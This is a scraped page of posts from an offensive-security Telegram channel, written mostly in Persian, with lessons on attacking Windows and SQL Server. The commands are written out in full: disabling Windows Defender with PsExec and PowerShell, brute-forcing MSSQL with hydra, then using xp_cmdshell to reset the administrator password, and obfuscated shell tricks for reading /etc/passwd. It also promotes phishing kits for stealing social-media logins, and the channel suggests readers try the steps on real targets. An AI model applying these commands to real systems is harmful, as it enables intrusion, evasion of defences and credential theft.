RedTeam


Гео и язык канала: не указан, не указан
Категория: не указана


Topics :
Red team (NetWork) ❗️
coding(c,python,powershell,bash)🧑‍💻
Phishing 👂
Penetration testing 👁
vulnerability 🦠
ransomware 👾
https://www.youtube.com/@RedTeam_APT

Связанные каналы

Гео и язык канала
не указан, не указан
Категория
не указана
Статистика
Фильтр публикаций


Видео недоступно для предпросмотра
Смотреть в Telegram
بریم برای مقدمات #Wireless_Hacking
۲ تا از ابزار هایی که تا ۲۴ ساعت اینده اموزش هاشو میذاریم مربوط به wireless attack میباشند که روش Evil Twin بیان و توضیحات و تست aircrack-ng , WifiPhisher داده میشه .
@RedTeamAPT


Видео недоступно для предпросмотра
Смотреть в Telegram
disable defender on windows 10
غیر فعال کردن defender با دسترسی shell با ابزار psexec
که حتما راجب این ابزار و کارهایی که میشه باهاش انجام داد ویدیو جداگانه گرفته میشه
PsExec64.exe -i -h \\192.168.141.145 -u -p powershell "Set-MpPreference -DisableRealtimeMonitoring $true"
@RedTeamAPT


#PowerShell
به تعدا packets های ارسالی توجه کنید
مربوط به ویدیو آخر کانال
$ipAddress = "192.168.141.145" # Replace with the target IP address
$ports = @(80, 443, 21, 22, 53 , 389 , 2049 , 135 , 137 , 25 , 162 , 139 , 445 , 161, 500, 80 , 443) # Define the ports to scan

foreach ($port in $ports) {
$tcpClient = New-Object System.Net.Sockets.TcpClient
try {
$tcpClient.ConnectAsync($ipAddress, $port).Wait(100) # 100 ms timeout
if ($tcpClient.Connected) {
Write-Host "Port $port is OPEN on $ipAddress"
}
} catch {
Write-Host "Port $port is CLOSED or unreachable on $ipAddress"
} finally {
if ($tcpClient.Connected) {
$tcpClient.Close()
}
}
}
@RedTeamAPT


@RedTeamAPT
$ipAddress="192.168.141.145"; $port=445; (New-Object System.Net.Sockets.TcpClient).ConnectAsync($ipAddress, $port).Wait(100) ? "Port $port is OPEN" : "Port $port is CLOSED or unreachable"
#PowerShell


Видео недоступно для предпросмотра
Смотреть в Telegram
@RedTeamAPT
#PowerShell
ممکنه گاهی فکر کنید یک سری از ابزار ها سر و صدای زیادی داره مانند nmap
ایا ابزار های جایگزین هست ؟
مقدمه ای بر استفاده از قطعه کد های بسیار مهم در مراحل انجام هک و تست نفوذ
@RedTeam


#commands
hydra -L users.txt -P password.txt mssql://192.168.141.145
sqsh -U sa -S 192.168.141.145
xp_cmdshell "net user administrator /active:yes"
xp_cmdshell "qeury session"
xp_cmdshell "net user administrator 123456"
xfreerdp /u:administrator /v:192.168.141.145
@RedTeamAPT


فعال کردن XP_cmdhell
EXECUTE sp_configure 'show advanced options', 1;
GO
RECONFIGURE;
GO
EXECUTE sp_configure 'xp_cmdshell', 1;
GO
RECONFIGURE;
GO
EXECUTE sp_configure 'show advanced options', 0;
GO
RECONFIGURE;
GO
@RedTeamAPT




Видео недоступно для предпросмотра
Смотреть в Telegram
@RedTeamAPT
#SQLserver

آموزش ابزار های :
.
hydra
sqsh
.
چطوری user , password یک دیتابیس رو بدست بیاریم
بعد ازوصل شدن بهش چطوری به کل سیستم دسترسی بگیرم و administrator بشم
بالاتر از دسترسی adminstrator هم میشه گرفت ؟؟
.
@RedTeamAPT


hydra -L UserList.txt -P PassList.txt -t 4 mssql://192.168.1.100
hydra :
ابزاری برای به دست اوردن user , password که سرویس های مختلفی را پشتیباتی میکند , در عکس بالا user , password دیتابیس SQL با استفاده از این ابزار به دست امده است .
@RedTeamAPT


Видео недоступно для предпросмотра
Смотреть в Telegram
به دست اوردن user , password از فایل passwd با دستورات گفته شده 😈😁
@RedTeamAPT


@RedTeamAPT
ابزار هایی که ما در روند attack , exploit قرار است استفاده کنیم :
1 - reconnaissance
2 - password & brute force attacks
3 - exploitation
4 - wireless attacks
5 - vulnerability scan
6 - post exploitation
7 - web app pen testing
8 - network based attacks
9 - social engineer & phishing
@RedTeamAPT


برای بدست اوردن فایل پسورد یوزر ها میشه ازین ۴ دستور هم استفاده کرد 💀😈
cat ${HOME:0:1}etc${HOME:0:1}passwd

`echo $'cat\x20\x2f\x65\x74\x63\x2f\x70\x61\x73\x73\x77\x64'`

cat $(echo . | tr '!-0' '"-1')etc$(echo . | tr '!-0' '"-1')passwd

cat `xxd -r -ps


Видео недоступно для предпросмотра
Смотреть в Telegram
@RedTeamAPT
#phishing

آموزش ابزار های :
.
zphisher
evilgnix2
.
این ابزار ها برای بدست اوردن یوزر و پسورد ۳۳ تا از برنامه و سایت های social media مناسب است
که ما داخل ویدیو بر رو سایت های :
instagram
pintrest
تست کردیم
source :
blueserver.ir
https://github.com/htr-tech/zphisher
https://github.com/kgretzky/evilginx2
bitly.com
.
@RedTeamAPT


دستورات و ابزار های ویدوی بالا :
@RedTeamAPT
winexe -U f.fazeli //192.168.141.138 cmd.exe
remmina -c rdp://administrator@192.168.141.139
xfreerdp /u:administrator /v:192.168.141.139
rpcclient -U administrator 192.168.141.138
@RedTeamAPT


Видео недоступно для предпросмотра
Смотреть в Telegram
@RedTeamAPT
#active_directory
آموزش ابزار های :
xfreerdp
remmina
winexe
rpcclient
.
اموزش به دست اوردن تمام اطلاعات active directory
.
users
groups
.
@RedTeamAPT


غیر فعال کردن انتی ویروس با دسترسی local admin به وسیله powershell
.
@RedTeamAPT
Get-MPPreference
Set-MPPreference -DisableRealTimeMonitoring $true
Set-MPPreference -DisableIOAVProtection $true
Set-MPPreference -DisableIntrusionPreventionSystem $true
@RedTeamAPT


@RedTeamAPT
وقت عزیزان بخیر
لازم دونستم توضیحات در رابطه با mind map ما برای کانال بدم
ببینید هم از pentest و هم از red team موارد بیان میکنیم , تست های واقعی انجام میدیم , گاهی لوکال تست میکنیم و دوستان اگر خواستند میتوانند خودشون این مراحل رو روی target واقعی تست کنند .
عموما داخل ویدیو ها بیان میکنیم که این red team هست یا pentest
@RedTeamAPT
ما اوایل سعی بر این داریم تا اشنایی های لازم ایجاد بشه بعدش مباحث تخصصی تر رو شروع کنیم مثل اینکه من چطوری یک برنامه مخرب رو کامپایل کنم که انتی ویروس نشناستش یا چطوری از یک سیستم دسترسی دائمی بگیرم و...
ممنون از همراهی شما
#RedTeam
#Pentest
@RedTeamAPT


SysinternalsSuite.zip
50.8Мб
ابزار sysinternal برای انجام مراحل ویدیو اموزشی بالا
@RedTeamAPT


Видео недоступно для предпросмотра
Смотреть в Telegram
@RedTeamAPT
توضیحات و مراحل انجام :
#enumeration
آموزش ابزار های :
ADexplorer
nmap -Sv , -sn , -p-
crackmapexec
nbtscan
اموزش به دست اوردن تمام اطلاعات active directory با یک یوزر معمولی !
policy
users
groups
systems
dns
@RedTeamAPT

Показано 20 последних публикаций.